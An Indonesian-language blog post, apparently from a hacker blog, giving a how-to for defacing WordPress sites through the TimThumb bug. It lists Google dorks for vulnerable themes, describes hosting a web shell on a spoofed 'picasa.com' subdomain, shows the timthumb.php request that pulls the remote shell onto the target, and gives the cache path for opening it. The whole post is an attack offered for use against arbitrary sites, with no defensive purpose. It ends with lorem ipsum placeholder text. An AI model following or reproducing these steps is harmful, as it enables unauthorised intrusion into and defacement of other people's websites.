Pages

0

Deface Dengan Timthumb Exploit Wordpress

 



Tim-thumb Exploit WordPress adalah teknik hacking yang dapat dilakukan dengan memanfaatkan bug pada Timthumb.php atau thumb.php.

Bahan - Bahan :
  - Modem
  - PC
  - Kopi
  - Rokok
  - Subdomain picasa.com.webkamu.org

Langkah - Langkah :

1. Meluncur Ke google Gunakan Dork Berikut

inurl:/wp-content/themes/TheStyle/
inurl:/wp-content/themes/nool/
inurl:/wp-content/themes/PersonalPress/
inurl:/wp-content/themes/SimplePress/
inurl:/wp-content/themes/DeepFocus/
inurl:/wp-content/themes/DelicateNews/
inurl:/wp-content/themes/Bold/
inurl:/wp-content/themes/eStore/
inurl:/wp-content/themes/TheProfessional/
inurl:/wp-content/themes/OnTheGo/
inurl:/wp-content/themes/AskIt/
inurl:/wp-content/themes/Nova/
inurl:/wp-content/themes/eNews/

USE YOUR BRAIN =))

2. Setelah menemukan target coba tambahkan timthumb.php
~> http://site/wp-content/themes/eStore/timthumb.php




3.Buat Subdomain di cpanel kamu ato di hosting picasa.com.websitekamu.org disini saya tidak akan menjelaskan cara membuat subdomain pasti semua udh pada bisa xD

4.Setelah Membuat subdomain Uplod shell di subdomain tadi sehingga menjadi
~> picasa.com/websitekamu.org/shell.php

5.Setelah Selesai Semua Langsung Di eksekusi Web Tadi Dengan Cara
~> http://site/wp-content/themes/eStore/timthumb.php?src= picasa.com/websitekamu.org/shell.php

6.Jika Keluar Seperti Gambar Ini Berarti Succes



7.Langsung Saja Buka Shellnya dgn cara
~> http://site/wp-content/themes/eStore/cache/md5_tadi.php
~> http://site/wp-content/themes/eStore/cache/b3e7dbdafde738b6e31c1d0b7fb93948.php

Unknown

Phasellus facilisis convallis metus, ut imperdiet augue auctor nec. Duis at velit id augue lobortis porta. Sed varius, enim accumsan aliquam tincidunt, tortor urna vulputate quam, eget finibus urna est in augue.

Tidak ada komentar:

Posting Komentar